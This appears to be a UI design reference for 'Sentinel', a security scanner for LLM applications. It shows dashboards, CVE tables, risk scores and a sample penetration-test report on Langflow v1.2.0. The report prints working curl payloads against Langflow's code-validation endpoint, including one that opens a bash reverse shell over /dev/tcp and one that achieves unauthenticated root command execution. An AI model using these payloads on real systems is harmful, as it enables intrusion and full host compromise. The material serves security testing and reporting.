Sentinel — UI Design Reference (All Screens)

Total Scans

48

LLM apps analysed

↑ 12 this month

CVEs Found

347

Across all components

183 proprietary

Critical Issues

24

Requiring action now

↑ 3 since last scan

Components

2,681

Dependencies mapped

100% parse rate

Recent Scans

Last 7 days

🤖

LangChain-RAG-Pipeline v2.1.4

SCA + Pen Test · 2h ago · 312 components

Critical

🔗

LlamaIndex-Enterprise v0.9.2

SCA · Yesterday · 187 components

High

⚡

OpenAI Agents SDK v1.2.0

SCA + Pen Test · 2 days ago · 94 components

High

🛠️

api4.ai2wj.com (OWASP Juice Shop)

Full Pen Test · 3 days ago · 1 Apr

Medium

🌐

AutoGPT v0.5.1

SCA · 5 days ago · 241 components

Low

Ecosystem Risk

72

Overall Risk Score

24

Critical

67

High

112

Medium

144

Low

Activity

Critical CVE in langchain-core 0.1.5 — CVE-2024-3095 (CVSS 9.1)

2 hours ago

Pen test on api4.ai2wj.com — 14 exploits confirmed

1 day ago

New proprietary CVE added — LlamaIndex injection vector

2 days ago

AutoGPT v0.5.1 — 241 components parsed, 0 false positives

5 days ago

Scan an LLM Application

Paste a repository URL or upload a project folder. Sentinel will map all components, detect CVEs, and run automated pen testing.

✓

Target

2

Scan Type

3

Run & Report

Application Target

or upload project folder

Drag & drop your project folder, or browse

Accepted: source folders, repositories, or individual code files

Select Scan Type

🔬

SCA Scan

Map all LLM components, detect CVEs, 0% false positive

⚔️

Pen Test

Automated agentic pen testing, 660 exploitation tasks

📊

Risk Score

Component-level scoring beyond CVSS for insurance & compliance

GitHub repositories run SCA. Public web URLs run Pen Test.

Severity Threshold

Report Format

Scan History

48 total

🤖

LangChain-RAG-Pipeline v2.1.4

SCA + Pen Test · 312 components · 6 Apr 2026 14:32

86

Critical

🔗

LlamaIndex-Enterprise v0.9.2

SCA · 187 components · 5 Apr 2026 09:14

71

High

⚡

OpenAI Agents SDK v1.2.0

SCA + Pen Test · 94 components · 4 Apr 2026 16:50

68

High

🛠️

api4.ai2wj.com (OWASP Juice Shop)

Full Pen Test · 1 Apr 2026 · Template report

54

Medium

🌐

AutoGPT v0.5.1

SCA · 241 components · 1 Apr 2026 11:05

22

Low

0%

Waiting for repository

Sentinel will clone the repository, run SCA, derive architecture layers, and enrich vulnerability results.

Queued SCA Architecture Vulnerability

1

SCA

2

Architecture

3

Vulnerability

SCA

Dependency detection and package inventory

pending

Architecture

Layer inference and dependency mapping

pending

Vulnerability

Offline enrichment and final risk matching

pending

86

LangChain-RAG-Pipeline v2.1.4

github.com/example-org/langchain-rag-pipeline · SCA + Pen Test · 312 components · 11m 24s

LangChain 0.1.5LlamaIndex 0.9.2OpenAI SDKPython 3.115 Critical CVEs

🔍

47

CVEs (5 proprietary)

🧩

312

Components (100% parse)

⚔️

14

Exploits confirmed

CVE Findings

Sorted by severity

CVE ID	Component	Severity	CVSS	Status
CVE-2024-3095	langchain-core 0.1.5	Critical	9.1	Unpatched
⬛ PROP-0047	llama-index 0.9.2	Critical	8.8	No public PoC
CVE-2024-1876	transformers 4.36.0	High	7.5	Patch available
CVE-2023-9182	openai 1.6.1	High	7.2	Patch available
⬛ PROP-0031	faiss-cpu 1.7.4	Medium	5.1	No public PoC

⬛ Proprietary CVE — detected only by Sentinel, not in NVD/OSV · Showing 5 of 47

Component Risk

Top contributors

langchain-core

0.1.5

95

llama-index

0.9.2

82

transformers

4.36.0

75

openai

1.6.1

60

74

LangChain-RAG-Pipeline v2.1.4

SCA Risk Score · 47 vulnerabilities across 312 components · Python 3.11 ecosystem

langchain-core 0.1.5 llama-index 0.9.2 transformers 4.36.0 openai 1.6.1 100% parse rate ⬛ 5 proprietary CVEs

Input files

requirements.txt

pyproject.toml

48 direct · 264 transitive

47

Total CVEs

5

Critical

12

High

18

Medium

Loading architecture…

Architecture Details

Click a component cluster in the graph

🏗️

Select a Component Layer

Click any cluster box in the architecture graph to view its mapped dependencies.

Dependencies with code traces are clickable → opens trace detail modal

Filter:

Showing all

	CVE / ID	Component	Ecosystem	Severity	CVSS	Fix Available	PoC
Loading vulnerabilities…

View in other tools:

Dependency Tree

312 components

langchain-core 0.1.5

2 Critical CVEs · risk 95

langchain-community 0.0.24

1 High CVE

pydantic 2.4.2

1 Medium CVE

anyio 3.7.1

No CVEs found

llama-index 0.9.2

1 Critical (Prop) · risk 82

openai 1.6.1

1 High CVE

tiktoken 0.5.2

No CVEs found

transformers 4.36.0

1 High CVE · risk 75

tokenizers 0.15.0

No CVEs found

safetensors 0.4.1

No CVEs found

Interactive D3 graph — connect to component API for full tree

● Critical ● High ● Medium ● Low / Clean

🏗️ Placeholder — connect to CVE library API (llmscapi.wj2ai.com) for live database

Total CVEs

2,847

NVD + OSV + Proprietary

Proprietary

183

Lab-only, no public PoC

LLM-Specific

341

LangChain, LlamaIndex, etc.

Added This Month

12

New entries Apr 2026

CVE Library

2,847 entries

CVE ID	Component	Type	Severity	CVSS	Source	Added
⬛ PROP-0047	llama-index 0.9.x	Prompt Injection	Critical	8.8	Proprietary	2 Apr 2026
CVE-2024-3095	langchain-core 0.1.x	Code Exec	Critical	9.1	NVD	Mar 2024
⬛ PROP-0031	faiss-cpu 1.7.x	Memory Corruption	Medium	5.1	Proprietary	28 Mar 2026
CVE-2024-1876	transformers 4.36.x	Deserialization	High	7.5	NVD	Jan 2024
⬛ PROP-0019	langchain-community	Tool Injection	High	7.0	Proprietary	15 Mar 2026
CVE-2023-9182	openai 1.6.x	Auth Bypass	High	7.2	NVD	Dec 2023

Showing 6 of 2,847 · ⬛ = Proprietary (lab-only) · Load more →

🏗️ Placeholder — connect to Yongchi's risk scoring API for live component scores

Score Breakdown by Factor

CVE Severity

38

Weighted CVSS scores across all components, adjusted for exploitability and impact scope.

Dependency Depth

22

Transitive dependency chain length. Deeper chains increase attack surface and reduce patch visibility.

Exploit Availability

18

Whether working exploits exist (public PoC, Metasploit module, or Sentinel proprietary exploit).

Patch Availability

8

Proportion of CVEs with no available patch. Unpatched CVEs receive higher weighting.

Overall Score

86

/ 100 · Critical Risk

📌 38 pts from CVE severity

📌 22 pts from dep. depth

📌 18 pts from exploit avail.

📌 8 pts from no patches

Insurance Input

Frequency proxy: 312 components

Severity distribution: 5C / 12H / 18M / 12L

Avg CVSS: 6.8

Proprietary CVE exposure: 5 CVEs

For NTU actuarial model · Prof Zhu Wenjun

Component-Level Scores (top 10)

Component	Version	CVE Count	Dep. Depth	Has Exploit	Patched	Score
langchain-core	0.1.5	4	3	Yes	No	95
llama-index	0.9.2	2	2	Partial	No	82
transformers	4.36.0	2	4	No	Yes	75
openai	1.6.1	1	2	No	Yes	60
faiss-cpu	1.7.4	1	1	Partial	No	45

Platform Connectors

API Keys

Scan Rules

Compliance Framework

Severity Thresholds

Custom Severity Labels

Map Sentinel severity levels to your organisation's internal classification. Exported reports will use your labels.

Report Defaults

▶ Live Demo

📘 Summary Report

1

Info Collection

2

Weakness Gathering

3

Filtering

4

Attack Planning

5

Exploitation

Attack Pipeline

✓

Info Collection

✓

Weakness Gathering

✓

Filtering

✓

Attack Planning

✓

Exploitation

Target

Langflow

v1.2.0 · Uvicorn/React

CVEs Tested

12

3 filtered for exploit

Exploited

2

CVE-2025-3248 · CVE-2025-57760

Outcome

Root Access

uid=0 confirmed

Pen Test Summary

14

Exploits confirmed

29

Attack objectives

Bounded test scope with non-lateral execution

Response-adaptive exploit strategy

Prompt injection chain: 3 paths found

I. Executive Summary

This automated penetration test targeted Langflow Workflow Platform v1.2.0, using the Sentinel LLM agent pipeline to simulate real-world attacks. The engagement covered reconnaissance, CVE discovery, exploit generation, and privilege escalation — resulting in confirmed root access to the target system.

II. Target Overview

ApplicationLangflow Workflow Platform v1.2.0
FrameworkReact + Uvicorn (Python)
Server43.156.238.180:7860
Key Endpoints/login · /api/v1/validate/code · /flow
Scan ModeNon-lateral · Zero collateral impact

III. Vulnerability Summary

CVE ID	Component	Type	Severity	Status
CVE-2025-3248	Langflow Core	Unauthenticated RCE	Critical	Exploited ✓
CVE-2025-57760	Langflow CLI	Privilege Escalation	High	Exploited ✓
CVE-2025-68155	React	XSS	High	Failed — patched

IV. Exploitation Walkthrough

🔍 Initial Reconnaissance

System detected: Langflow Workflow Platform v1.2.0
Live API discovered: /api/v1/validate/code
Auth endpoint: /login (JWT-based)

🎯 Exploit 1 — Privilege Escalation via CVE-2025-57760

A privilege escalation vulnerability in Langflow containers allows an authenticated user with RCE access to invoke the internal CLI to create a new superuser. This bypasses the UI registration flow, granting full admin access.

$ curl -X POST http://43.156.238.180:7860/api/v1/validate/code \ -H "Content-Type: application/json" \ -d '{ "code": "def foo(p=__import__(os).system(bash -i >& /dev/tcp/192.168.1.22/4444)):\n pass" }' $ /app/.venv/bin/langflow superuser Username: test | Password: test123456 Default folder created successfully. Superuser created successfully. HTTP/1.1 200 OK → is_superuser: true

🚀 Exploit 2 — Unauthenticated RCE via CVE-2025-3248

A remote, unauthenticated attacker can send crafted HTTP requests to the code validation endpoint to execute arbitrary system commands — without any login required.

$ curl -X POST http://43.156.238.180:7860/api/v1/validate/code \ -H "Content-Type: application/json" \ -d '{ "code": "@exec(raise Exception(subprocess.check_output([id])))\ndef foo():\n pass" }' HTTP/1.1 200 OK { "function": { "errors": [ "uid=0(root) gid=0(root) groups=0(root)" ] } }

V. Findings & Recommendations

✅ Finding

CVE-2025-57760 enables remote attackers to create a new administrative user via internal CLI abuse. CVE-2025-3248 enables remote, unauthenticated attackers to execute arbitrary system commands including root-level account modifications.

🚨 Impact

Full system compromise achieved. Attacker obtained administrator privileges in the application and root shell access via unauthenticated remote command injection. All data on the host is at risk.

🛠️ Recommendations

↑ Upgrade Langflow to a patched version immediately
🔒 Restrict access to /api/v1/validate/code — require auth + IP allowlist
🛡️ Introduce strict input sandboxing / code execution isolation
🔑 Deploy API authentication and rate-limiting on all endpoints
📊 Conduct continuous security regression testing with Sentinel